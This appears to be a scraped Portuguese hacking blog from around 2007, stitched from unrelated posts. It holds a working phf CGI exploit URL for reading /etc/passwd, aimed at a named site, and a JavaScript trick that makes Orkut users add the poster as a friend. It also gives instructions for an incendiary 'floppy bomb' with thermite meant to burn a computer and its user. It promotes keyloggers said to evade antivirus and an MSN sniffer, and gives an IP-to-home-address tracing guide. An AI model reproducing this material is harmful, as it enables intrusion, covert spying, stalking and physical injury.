Hackers quebram completamente proteção do Vista
O grupo hacker NoPE diz ter conseguido quebrar completamente pela primeira vez o novo sistema operacional da Microsoft, Windows Vista. Por seu alto sistema de proteção e complexidade de ativação, nenhuma ferramenta de quebra ainda havia sido completamente bem sucedida.Já estaria circulando no mercado oriental uma versão do Vista sem necessidade de ativação, com atualizações funcionais e sem pedir sequer um número serial, conforme noticiou o site Newlaunches.Entre os métodos anteriores de destravamento estavam programas como os que retardam indefinidamente a ativação e um kit de ferramentas de emulação. Contudo, o lançamento do NoPE seria um divisor de águas na batalha entre os hackers e a Microsoft, já que esta seria a primeira vez que o novo sistema da empresa aparece completamente destravado e ativado.Alguns depoimentos na internet ainda dão conta de que a solução é de fato funcional, mas é improvável que esta fique por muito tempo disponível. A Microsoft está ainda mais dedicada em acabar com a pirataria, problema no momento paliativamente resolvido através da ferramenta de atualização Windows Update.No entanto, segundo o site The Inquirer, caso a solução hacker tenha sido uma alteração na imagem gravada no DVD, com uma versão previamente desbloqueada, os hackers já descobriram um método que pode dificultar, e muito, o trabalho da Microsoft.

crie um lammer

oq e um lammer lammer e um codigo que vc da para as pessoas te adicionar vc fala que e para elas adicionar 10 pessoas por minutos ai ela vai te adicionar como fuciona e simples so vc emvia esse codia ai abaixo para apessoa como asim vc coloca o numero do seu orkut quefica la da bara de emdereços no lugar das estrelinha ta ligado ai e so emviarquau quer duvida me adicione no msn:enio_nene@hotmail.com.
javascript:_=document.forms[1]; _.action='FriendAdd.aspx?Action.yes&uid=****************';_.submit();

downloads de hacker


[Down] Universidade Hacker + Conteudo dos CD's
Bom Pessoal, Sei que o Livro Universidade Hacker e Os CD's podem ser encontrados em alguns sites por ai na verdade varios sites, porém são todos hospedados no MEGAUPLOAD, EASYSHARE, RAPIDSHARE e Etc... que são servidores que colocam muitos impecilios para o usúario baixar arquivos neles com limite de Slots, tempo de espera, limite de banda entre outros... e como se não fosse suficiente tanto trabalho são divididos em Varias partes o que dificulta ainda mais... indiguinado com isso me deu até vontade de comprar o livro... mas como nos dias de hoje ngm compra mais nada e tudo baixado da internet... (Livros, Revistas, Softwares, S.O) resolvi tentar mais e consegui...O Livro Universidade Hacker e o Conteudo dos CD's em um servidor propio de um site que pode ser baixado com gerenciador de download sem espera e não esta dividido em varias partes...quem gosta deste tipo de Literatura e se interessou pelo download, pode baixar no site: www.brhackers.99k.orgBaixem la e quem quiser comentar aqui sobre o que achou da facilidade, fico grato...e aproposito la tem outros livros tbm para download, todos sobre informática, assuntos diversos e claro....

sexta-feira, 9 de novembro de 2007


Transforme vídeos a partir do Windows e visualize-os em seu telefone celular
O aplicativo SmartMovie é uma interessante solução que lhe ajudará a transformar seu telefone celular em um tocador de vídeo portátil.O programa é composto por dois programas: um conversor de formatos para Windows e um visualizador de vídeos para seu telefone celular.Graças à simbiose deste programa, com SmartMovie você pode adaptar qualquer vídeo que esteja guardado no computador de casa, passá-lo para a memória de seu telefone celular e visualizá-lo como e onde quiser.Com referência às suas características, SmartMovie é compatível com AVI, MPG, MPEG, WNV e M1V, oferece suporte XviD (codecs não inclusos), permite reproduzir vídeos em modo normal ou em paisagem e inclui uma série de ferramentas para dividir vídeos, incluir legendas, previsualizá-los, personalizar o bitrate da conversão, aumentar o volume, entre outras possibilidades.
Tam.: 2.8MB
Idioma: Inglês
Hospedagem: Easy-Share

Coloque Seu Nome Do Lado Do Relogio


Coloque Seu Nome Do Lado Do Relogio
COLOQUE SEU NOME EM SEU MICRO AO LADO DO RELÓGIOPasso a passo!Vai em Meu Iniciar/Painel de controle/Opções Regionais e de idiomas, na guia Opções regionais clique em Personalizar...Ao abrir nova janela clique em HoraNo campo Formato de hora , troque "HH:mm: ss" por "HH:mm tt" (com um espaço entre "mm" e "tt" e sem aspas);Nos campos Símbolo a.m. e Símbolo p.m. , coloque o texto desejado (o mesmo nos dois campos);Clique aplicar/ok e aplicar e okDesta maneira ficará seu nome do lado direito do relógio.Pode colocar o nome nos 2 lados do relógio, faça os mesmos passos acima, mas no campo Formato de hora:coloque assim: 'Prorat' HH:mm tt (com as aspas)

hide ip platinum 3.50

» DescriçãoHide IP Platinum é um utilitário para todos aqueles preocupados com sua privacidade e que queiram evitar, na medida do possível, que seus movimentos pela Internet sejam rastreados.
Este utilitário procura servidores Proxy disponíveis (anônimos), configurando-o instantaneamente como seu sem que você tenha que fazer nada.Desta forma você estará protegido de rastreamentos de atividades que estejam baseadas no IP; além disso, também dificultará o ataque de hackers impossibilitando que eles saibam seu verdadeiro IP.Pode ser ativado e desativado facilmente, assim como troca de Proxy, que pode ser feito simplesmente com um duplo clique.
» Sistema OperacionalWindows 98/2000/XP/2003/Vista.
» InformaçõesServidor: RapidSharePartes: 1 ParteTamanho: 980 KbFormato: .RAR
» InformaçõesServidor:

RapidSharePartes:

1 ParteTamanho:


pai querro ser hacker




Seu filho passa horas na frente do computador e até esquece de se alimentar enquanto está jogando? Tudo isso faz parte da realidade da era digital. O importante é saber que é possível transformar esse gosto pela tecnologia em algo positivo, divertido e rentável.
Fique tranqüilo: hacker ético não é o criminoso, o vilão da Internet. Hoje em dia, ser hacker do bem significa ter boas oportunidades de emprego nas empresas de tecnologia.
O objetivo do HackerTeen é ensinar tecnologia de maneira inovadora e divertida para os jovens e mostrar que a paixão que eles têm por computadores pode se tornar uma grande profissão.
Quando alguém fica muitas horas no computador nem sempre está aprendendo algo útil para o futuro. U ma das premissas do HackerTeen é fazer um acordo com o jovem: navegar e jogar menos e aprender mais, diminuindo o tempo que passa na frente do computador. No Brasil, um psico-pedagoga foi designada para monitorar isso juntamente com os pais.
A boa notícia é que os jovens acham o HackerTeen tão legal que todos fazem esse acordo sem reclamar. No Brasil, a maior parte das aulas (75%) é feita no computador de casa, com um professor na sala de aula virtual, pela Internet; as demais (25%) são presenciais e ministradas na forma de jogos, onde o jovem vive situações reais de um desafio ou de um ambiente de trabalho. Veja um exemplo de jogo presencial.
Alguns pais acreditam que quando os filhos ficam dentro do quarto navegando na Internet estão seguros. Puro engano. A Internet é uma janela para o mundo: tanto para coisas boas como para as ruins. Muitas vezes, sem que você saiba, seu filho pode aprender besteiras que não lhe serão nada úteis para a vida ou para quando surgir uma oportunidade de emprego.
A Internet mudou a maneira como nós – e também as empresas – nos relacionamos uns com os outros. Hoje tudo é informação e quanto mais o jovem souber usá-las de forma útil, melhor para o futuro dele.
Saber lidar com os servidores (grandes computadores das empresas) é extremamente útil e nessa área estão os melhores salários. Por isso o HackerTeen é focado em Segurança de Computação nos servidores. Existem muitas vagas no mercado, o que não há são jovens profissionais capacitados para ocupá-las.
O HackerTeen é uma grande oportunidade para seu filho e a metodologia inovadora do projeto fez com que ele fosse considerado único no mundo por uma das maiores universidades: a Harvard Business School.
O projeto HackerTeen desperta o interesse de muitas pessoas e já foi notícias em diversos veículos de comunicação: canais de televisão, rádios, jornais e revistas. Leia algumas das reportagens.
Obs.: O projeto HackerTeen visa atender jovens de diversas localidades do mundo. Atualmente, está disponível na língua Portuguesa (no Brasil) e em fase de implantação nas línguas Inglesa e Espanhola.

Construa um Disquete Bomba



Construa um Disquete Bomba

Essa é uma super dica, leia com bastante atenção para não errar, ok?
Você vai precisar de:

Um ou mais discos de 1.44 Mb;
Uma caixa de fósforo, azul ou branco SOMENTE;
Um estilete bem afiado;
Um frasco de cimento plástico ou argamassa;
Um centímetro de magnésio em tiras (opicional);
Uma grama de termite. Mistura de aluminio pulverizado e óxido de ferro, usada
na produção do aço (opicional)

Instruções:

Abra cuidadosamente o disquete. Com o disco aberto você tem que escolher
entre arrancar a proteção onde fica a marca do disco (normalmente de metal),
ou deixar ela no lugar. Se a proteção for arrancada, a bomba vai ficar visível e
você mesmo terá de colocá-la no drive. Se a proteção ficar no lugar, você pode
dar o disco para um "amigo".

Raspe a cabeça dos fósforos e amasse para que vire um pó. Retire o pano do
disquette e cubra um ou ambos os lados do disco com argamassa. Espalhe o
pó dos fósforos em cima e deixe secar. Feche o disco colocando os cantos e
pronto.

Se você quiser um estrago maior, coloque a tira de magnésio em cima do pó
dos fósforos. Se você quiser destruir o computador, coloque o termite em baixo
do magnésio.

Funcionamento:

Quando o disco for acessado, o pó dos fósforos irá atritar e acender. O disco
vai derreter e se espalhar pelo drive. Se você usou o magnésio, o calor gerado
pelos fósforos vai acender a tira. O magnésio vai queimar destruindo o drive
permanete e, com sorte, outras coisas mais que estiverem perto. Se você usou
o magnésio e o termite juntos, o magnésio irá acender o termite e ele vai
começar a agir. O termite vai queimar o disco, o drive, o gabinete, a mesa, o
chão, o quarto e o usuário. Hehehe

Net Buster

Net Buster
Proteção contra o Netbus
306kb
downloads:http://www.geocities.com/giugoncales/programahack.htm

alemaoks aviza

mu e um jogo muito bom
mas vicia no primeiro dia que vc joga
vc vai vicia vai querrer jogar de 3 horas a
12 horas por dia ,nao se vicie

Firewalls

Firewalls WinGate 6.2.2
Um dos melhores programas de proxy do mercado. Conecte v�rios computadores � internet, usando apenas um modem. Funciona tambem com um firewall. Durante a instala��o voc� poder� optar por usar a vers�o Home, Standard ou Pro.
1340kb

Firewalls

Firewalls programa:Hping2
hping2 e uma ferramenta capaz de enviar pacotes ICMP, UDP e TCP, e mostrar a resposta do alvo como o ping faz. Com o hping2 voc� pode testar as regras de firewalls, scanear portas, testar a performance da rede usando diferentes protocolos e transferir arquivos mesmo entre firewalls entre outras coisas.
176kb

PETITE 2.3


Programa compressor de arquivos 32Bits que pode juntar dois arquivos em um s�o. Seu antivirus n�o encontrara nenhum vi�rus.
107 kb

Triton 2.1


Programa que testa vulnerabilidades em sites atraves de exploits.
147 kb

Active Perl


Compilador de perl, usado tambem pra compilar exploits.
tamanho: 1290 kb

como localizar um ip




Como alguns usuários tinham algumas dúvidas de como rastrear um IP decidi postar esse tutorial feito pelo SPYNET...simples mas muito bom para iniciantes..Rastreando ipEscrito por SPYNETAchei esses links interessantes, eles mostram a Cidade/País/CEP de um IP informado.E claro, não é 100% correto mas dá pra ter uma idéia legal do endereço.Então vamos há algumas explicações dos passos para rastrear um IP.Primeiro é bom distinguir IPs nacionais dos internacionais, no Brasil a faixa inicial geralmente são:200.x.x.x e 201.x.x.x, não é regra, há alguns com 207.x.x.x por exemplo mas não é tão comum.É necessário saber isto para agilizar sua busca, pois não adianta procurar no sistema de consulta de CEPs um IP lá da China.Mas como cérebro foi feito pra lembrar a programação da TV e não números, aqui vai a solução: http://www.maxmind.com/app/lookupInforme o IP, e será mostrado de qual ele pertence.______________________________Agora entendendo um pouco de como os sistemas de buscas relacionam CEPs com IPs:Bom tudo começa das estruturas físicas da rede, físico me refiro a fios, postes, caixas telefônicas, localização do provedor, etc. Quando você recebe um IP, seu provedor gera ele apartir do seu CEP(não é bem um cálculo com seu CEP e sim questão de proximidades).Explico: Supomos que você recebeu o IP 200.196.196.5 e seu vizinho recebeu 200.150.30.2, sendo que ele mora no mesmo CEP que vc,o que aconteceria é que o ping(tempo para recebimento de pacotes) demoraria(suposição) uns 150ms(isso é lento, sim eu amo parenteses :lol.O que na realidade deveria ser uns 70ms mais ou menos.Então o provedor lhe atribui IPs conforme seu CEP, sendo assim seu vizinho provavelmente receberá um IP semelhante ao seu, pelo menos na teoria seria assim, ao menos que se escasse os IPs semelhantes, mas aí é outro papo.Entendido isso de CEP x IP, vamos a forma de rastreá-los.______________________________Há um projeto nacional chamado IPGeo mantido pelo Portal RankBrasil, que mantêm um banco de dados com uma relação imensa de IPs -> CEPs. Bom ao certo de onde eles colhem essas informações eu não sei, suponho que seja algo vinculado aos provedores e ao Registro.br.Então vamos lá, acesse o site: http://www.ipgeo.com.br/E informe o IP que deseja consultar, como exemplo vou usar o meu atual: IP 200.203.3.62O que vai acontecer, o sistema irá sempre mostrar uma série de resultados, pois são os IPs mais semelhantes ao seu, caso encontreexatamente o IP informado, ele irá ser mostrado no topo da lista.Resultado obtido:CitarProximidades de IP com CEPs confirmados200.203.3.62 95020180 Caxias do Sul RS200.203.3.63 95180000 Farroupilha RS200.203.3.63 95700000 Bento Gonçalves RS200.203.3.64 95020320 Caxias do Sul RS200.203.3.64 95020460 Caxias do Sul RS200.203.3.64 95097000 Caxias do Sul RS200.203.3.65 95010100 Caxias do Sul RSPróximo passo, como localizou meu IP exato, procurei no site dos correios o CEP que me apresentou.http://www.correios.com.br/servicos/cep/cep_cep.cfmE olhem o resultado:Sim, o endereço tá correto mesmo, aqui da empresa.Ah detalhe bastante importante, MEU IP NÃO É FIXO NEM EMPRESARIAL.Agora acontece também de não mostrar o IP informado e sim só os das proximidades, então caso saiba mais informações(como a cidade por exemplo) sobre o IP que está consultando, lhe ajudará a filtrar os resultados mostrados.Acontece também de não mostrar corretamente a cidade, acredito que ocorre pois o banco de dados pode estar desatualizado, sendo que é feito a nova verificação a cada 24h, então caso tenha certeza que o resultado mostrado está incorreto, anote o IP e consulte novamente dentro de algumas horas ou no dia seguinte.Básicamente para IPs nacionais seria isso, como eu falei não é 100% mas ajuda.______________________________Ainda em buscas no Brasil temos outro recurso que é o Registro.br(http://www.registro.br)/.Já essa alternativa é mais adequada de quando estamos consultando IPs(fixos) de servidores, os quais estão registrados um dominío, um IP fixo empresarial, etc.Caso consultar um IP dinâmico qualquer, provavelmente os resultados serão os dados do companhia de telecomunicações da região, como Brasil Telecom.Exemplo, consultei pelo meu IP:Citar...inetnum: 200.203.0/17asn: AS8167ID abusos: BTA17entidade: Brasil Telecom S/A - Filial Distrito Federaldocumento: 076.535.764/0326-90responsável: Brasil Telecom S. A. - CNRSendereço: SEPS 702/092 Cj. B - Bl B 3 andar Gen. Alencastro, S/N,endereço: 70390-025 - Brasilia - DFtelefone: (61) 415-4201 []ID entidade: BTC14ID técnico: BTC14inetrev: 200.203.0/24servidor DNS: ns3.brasiltelecom.net.br...Agora outra consulta, mas pelo IP 200.176.3.142Citar...inetnum: 200.176/16asn: AS11706ID abusos: ABT82entidade: Terra Networks Brasil S.A.documento: 091.088.328/0003-29responsável: Hostmaster Terra Networksendereço: João Manoel, 90,endereço: 90010-030 - Porto Alegre - RStelefone: (51) 32844000 []ID entidade: MPL4ID técnico: MPL4inetrev: 200.176.0/18servidor DNS: ns1.terra.com.br...Como deu pra notar, é o IP do terra.com.br, então essa é a diferença de um IP registrado.______________________________Mas e no caso de um IP que não seja do Brasil ?Bom aí se fizermos pelo método anterior não teremos resultados precisos. Para isso há outro site americano, MaxMindque disponibiliza recursos semelhantes ao IPGeo.Acesse: http://www.maxmind.com/app/lookup_cityE a teoria é a mesma, porém como é outro país o sistema de caixa postal (CEP) será diferente.Então como saber onde procurar, aqui: http://www.embassyworld.com/data/Zip_Codes.htmlhá uma listagem de serviços e sites que buscam códigos postais de diversos países.Vamos a um exemplo na prática!Enquanto estava no painel de administração do Fanta Hackers observei que tinha um visitante com IP do exterior, esse: 65.214.39.151Fiquei curioso e resolvi rastrear ele, vamos aos passos:- Descobrindo País/Cidade/EstadoResultado:- Como ninguém nasceu de susto, vamos confirmar realmente se o MaxMind trouxe informações boas. Para isso consultaremos também no Whois (http://whois.lacnic.net/) que é o substituto do Registro.br mas para consultar internacionais.Então tudo certo, os dados estão corretos mesmo:CitarOrgName: AskJeeves, Inc.OrgID: C00555427Address: 5858 Horton StreetCity: EmeryvilleStateProv: CAPostalCode: 94608Country: USBom essa foi fácil, como deu pra notar é um IP empresarial no qual já nos mostrou inclusive o nome da organização AskJeeves- Uma consulta rápida no oráculo pela empresa e chegamos à http://www.ask.com/- Pra quem deduziu, descobrimos já quem é nosso visitante. Como trata-se de um portal de buscas, o nosso convidado é um WebBot que esta catalogando os dados contidos no Fanta.Mas vamos continuar a busca:- Acesse http://maps.google.com/ e informe o nome da empresa AskJeeves- Altere o modo de visualização para Hybrid(imagem de satélite + nomeclatura de ruas)- Ao lado, irá nos mostrar uma listagem de diversas filiais da empresa, como já sabemos que a desejada encontra-se em Emeryville - California, selecionamos esta.- Chegamos ao resultado preciso abaixo:Alguém quer fazer uma visita a eles?-------Porém como citei antes, essa foi fácil, localizar uma empresa não é nada complicado. Mas e no caso de um usuário internacional comum?Nesse ponto nossos recursos se restringem um pouco, mas vamos ver até onde conseguimos chegar.Nosso IP de exemplo será: 69.18.1.201- Consultando a localização www.maxmind.com/app/lookup_city- O que identificamos: Local Internet Service Company, bom agora complicou pois não é tão simples como antes, descobrimos que o IP é de um Provedor de Internet.Ou seja, um usuário comum.- Seguimos direto para o Google Maps e informamos os dados da cidade:- Nesse caso o melhor modo de visualização é Map;- Como essa cidade Fairfield parece ser o lugar onde o diabo perdeu as meias, o zoom no mapa é bem limitado:- Então vamos tentar no MapQuest(http://www.mapquest.com/) e informamos o código postal: 52556Bom, um pouco mais detalhado...Com isso as informações que temos, consiguimos chegar até este ponto, não obtivemos o endereço específico, mas uma noção boa da localização.______________________________Bom, então o passo-a-passo que eu sugestionaria para iniciar um rastreamento seria os seguinte:- Analise o IP e descubra qual seu país;http://www.maxmind.com/app/lookup- Sabendo a nacionalidade:* Se for nacional:1) Consulte no http://www.registro.br/2) Se constatar que o IP não está registrado, pesquise novamente em http://www.ipgeo.com.br/3) Tendo o CEP em mãos, consulte ele http://www.correios.com.br/servicos/cep/cep_cep.cfm* Caso seja internacional:1) Busque primeiro no Whois: http://whois.lacnic.net/2) Senão retornar nada útil tente em: http://www.maxmind.com/app/lookup_city3) Descoberto o país, consulte em http://www.embassyworld.com/data/Zip_Codes.html4) Acesse algum dos sites da lista referente ao país do IP5) Busque pelo código postal localizado6) Caso seja americano, uma boa dica é procurar no Google Maps- E se não conseguiu com nenhuma dessas alternativas, bom aí só resta ligar para o provedor do IP, e tentar passar uma engenhariasocial convencendo eles a te darem os dados do IP. O que eu acho quase impossível, a menos que vc seja da PF hahaha._______________________________

como roubar um site

essa e maneira mas facio de rouba um site
mas nao pense so por que e fasio tem muita chace
vc so tem de 30% a 50% de chace e muito pouco vc tem que
rouba um site fraco nao queira rouba site de orkut
de msn que nao vai dar nao
ok vc tem rouba site como o site de calsinhapreta
um dos sites que eu ja roubei como o do calsinhapreta
www.calsinhapreta.com.br
vc vai fazer a seginte coisa vai coloca
o site que vc quer rouba no
htpp://***********/cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd
na estrelinha vc coloca o site ex:htpp://www.calsinhapreta.com.br/cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd
nao pense que vc e um racker so por que aprendeu a fazer isso nao
so estou emcinando conhecimento nao e crime vlw...

Direct MIDI to MP3 Converter 3.0.10.0


Download link 1 (Recomendado)http://www.download3k.com/DownloadLink1-PistonSoft-Direct-MIDI-to-MP3-Converter.html
Download link 2

MSN BuscaBorrados 1.2

MSN BuscaBorrados 1.2
MSN BuscaBorrados é um aplicativo que revela se seus supostos amigos lhe bloquearam no MSN Messenger. Ele funciona com todas as versões do MSN, obtendo informações diretamente do servidor. Não funciona sob proxy, roteador ou WinGate (ou outro aplicativo que feche a porta do messenger).
Downloadhttp://www.4shared.com/file/19022226/d04f0a/MSNBuscaBorrados.html

registro hacker


registro

login:_____.

senha:_____.

embreve

curso de hacker ético Inicialização da memória





No Start Kernel (main.c) há 3 variáveis relatadas para inicialização da memória:



memory_start começa a 1 Mb atualizado pelo projeto de inicialização.
memory_end término da memória física: 8 Mb, 16 Mb, ou qualquer outro.
Low memory_start término do código Kernel e dados que é carregado inicialmente



Cada projeto init tipicamente torna memory_start e retorna um valor atualizado, se distribui espaços no memory_start (simplesmente pegando-a). Paging init ( ) inicializa a page-tables no { tt swapper - pg - dir} ( começando a 0 X 0000000) para cobrir toda a memória física do memory_start para memory_end. Na verdade o primeiro 4 Mb é feito no startup_32 (heads).memory_start é incrementado se quaisquer nova page-tables são adicionados.
A primeira página é zerada para bloquear os indicadores das referências do alçapão nulo no Kernel.
No sched_init ( ) o 1 dt e tss descritores para tarefa [0] são postos no GDT, e carregado para dentro do TR e LDTR (a única vez que isto é feito explicitamente). Um trap gate (0X80) é ordenado para system-call.( ).
A bandeira tarefa aninhada é desligada na preparação para entrada do modo usuário: O cronômetro é ligado. O task-struct para task [0] aparece por inteiro em <>
mem_map é então construído por mem_init ( ) para refletir o corrente uso das páginas físicas. Este é o estado refletido no mapa da memória física da seção anterior. Então Dinux move para dentro do modo usuário com um iret após empurrar o corrente ss, esp, etc.
Claro que o segmento usuário para task [0] são mapeados bem sobre os segmentos Kernel e deste modo a execução continua exatamente onde isto termina.
Task [0]:



pg_dir = swapper - pg - dir que sigmifica apenas endereços mapeados estão no alcance 3 Gb para 3 Gb + High memory.



LTD [1] = código usuário, base = 0 x 0000000, tamanho = 640 K
LDT [2] = dados usuários, base = 0 x 0000000, tamanho = 640 k



O primeiro exec ( ) põe a LTD entrada para task [1] para os valores usuários da base = 0x0, limite = task_size = 0 x c 0000000. Depois disso, nenhum processo vê os segmentos Kernel enquanto no modo usuário.
Processos e a Administração da Memória.
Memória relacionada trabalho feito por fork ( ):
· distribuição de memória
· 1 página para o Task-struct
· 1 página para o Kernel Stack
· 1 para o pg_dir e algumas para pg_tables (cópias - páginas - tabelas)
· Outras mudanças
· sso põe para o segmento Kernel stack (0x10) para ter certeza?
espo põe para o topo da nova distribuição Kernel - stack - page.
· c r 3 põe por copy - page - tables ( ) para indicar para nova página de diretório distribuída
· 1 dt = LDT (task_nr) cria novo 1 dt descritor
· descritores põe no gdt para novo tss e 1 dt [ ]
· Os registros restantes são herdados do parent.
Os processos resultam dividindo seus códigos e segmentos de dados (embora eles tenham tabelas descritoras locais separados, as entradas indicam para os mesmos segmentos). O stack e páginas de dados serão copiados quando o parent ou child escreve para eles ( copy-on-write).
Memória relacionada trabalho feito por exec ( ):
· distribuição de memória
· 1 página para exec header para omagic
· 1 página ou mais para stack (max_arg_pages)
· clear-página-tables ( ) usado para remover páginas velhas.
· change 1 dt ( ) põe os descritores no novo 1 dt [ ]
· 1 dt [1] = código base = 0 x 00, limite = task - size
· 1 dt [2] = data base = 0 x 00, limite = task - size
Estes segmentos são dpl = 3, p=1, s=1, g=1. Tipo = a (código or 2 dados)
· Eleva para MAX_ARG_PAGES páginas sujas de arqu e enup são distribuídos e guardado ao topo do segmento de dados para o novo usuário pilha criado.
· Ponha os indicadores de instrução do caller cip = ex.a_cutry
· Ponha o stack indicador do caller para o stack criado (esp=stack indicador). Este serão eliminados do Stack quando o caller resume.



Limites de Memória Atualizados
· cud_code = ex.a_text
· cud_data = cud_code + &x.d_data
· brK = end_data + ex.ª_bss



Interrupções e traps são sustentadas dentro do contexto da corrente tarefa. Em particular, o diretório de páginas do corrente processo é usado na tradução de endereços. Os segmentos, de qualquer modo, são segmentos Kernel para que todos os endereços lineares apontem para dentro da memória Kernel quer acessar uma variável no endereço 0 x 01. O endereço linear é 0 x 00000001 (usando segmentos Kernel) e o endereço físico é 0 x 01. O último é porque a página do processo diretório mapea esta extensão exatamente como page_pg_dir.
O espaço Kernel (0 x c 0000000 + high - memory) e mapeado pela tabela de páginas Kernel que são eles mesmos parte da memória reservada. Eles são consequentemente divididas por todos processos. Durante um fork copy-page-tables ( ) trata tabela de páginas reservadas diferentemente. Isto põe indicadores no diretório de páginas de processo para indicar para tabelas de página Kernel e na verdade não distribui novas tabelas de páginas como isto faz normalmente. Como um exemplo o Kernel - Stack - page ( que ocupa algum lugar no espaço Kernel ) não precisa de um associado page - table distribuídos no pg-dir do processo para mapeá-lo.
O interruptor de instruções põe o indicador stack e o segmento stack do privilégio valor salvo no Tss do corrente task. Note que o Kernel stack é um objeto realmente fragmentado - Isto não é um objeto único, mas sim um grupo de stack frames. Cada um distribuído quando um processo é criado e deixado quando ele sai. O Kernel stack não deveria crescer tão rapidamente dentro de um contexto de um processo que extende abaixo da corrente frame.
(Leia mais... 10 Comentários Pontos 0)
Curso de Linux Gratis #09 - curso de hacker ético - www.thehacker.com.br
Publicada por wilsonSegunda, junho 25 @ 00:00:00 FNT

Distribuição da memória do processo usuário






O Stack, shlibs e os dados são muito afastados um do outro para serem spanned por uma tabela de página. Todas KPT são divididas por todos processo e deste modo eles não estão na lista. Apenas páginas sujas são trocadas. Páginas limpas são roubadas e deste modo o processo pode tê-los de volta para o executável se for desejado. A maioria das vezes apenas as páginas limpas são divididas. Uma página suja termina dividida sobre um fork até que parent ou child escolham para escrever isto de novo.
Administração dos dados da memória na tabela do processo.
Aqui está um sumário de algum dos dados mantidos na tabela do processo que é usado para administração da memória.
Limites do processo da memória.
Ulong - start_code - and_code - and_data - brk, atart - stock



Erro de contagem de página.

alemaoks

alemaoks o moderador aviza quem tem pc da numeração de 14598625.01254 ate 1569898742.19857 esta corendo risco por favo mande uma mensagem para

invisible keylogger3.7






Fa�a logs de palavras digitadas no seu teclado. Completamente indetect�vel e n�o pode ser visto na lista de processos, menu de programas, �cones, etc. � capaz de logar qualquer coisa digitada, incluindo chats, emails, sites visitados, etc.




muito bom alemaoks e bom mesmo vlw....


270kb

Ardamax keylogger2.8





Esse com certeza e o melhor keylogger do momento indetectavel pelos Anti-vi�rus.




tamanho:
272 Kb

downloads


MSN Protocol Analyzer

E uma utilidade de rede que possa monitorar (ou capta��o, monitor) as sessoes do protocolo de MSN. Se voc� usar este programa na combina��o com programa de SwitchSniffer,voc� pode capturar e ver todas as sessoes de MSN including conversassoes e comandos de MSN. benefi�cios e caracteri�sticas do MSNPAnalyzer pode monitorar 2 NICKS ou mais em uma vez MSNPAnalyzer pode mostrar comandos de MSN e os procedimentos da conex�o. MSNPAnalyzer permite-o de ver todas as conversa��es na rede se MSNPAnalyzer for usado no conbination com programa de SwitchSniffer, voc� pode capturar todo ve todos os protocolos e conversa��es de MSN. MSNPAnalyzer analisa gramaticalmente, descodifica, analisando o protocolo de MSN no real-time, MSNPAnalyzer permite-o a ver os I�ndices, comandos e as sessoes de MSN protocolam on-the-fly.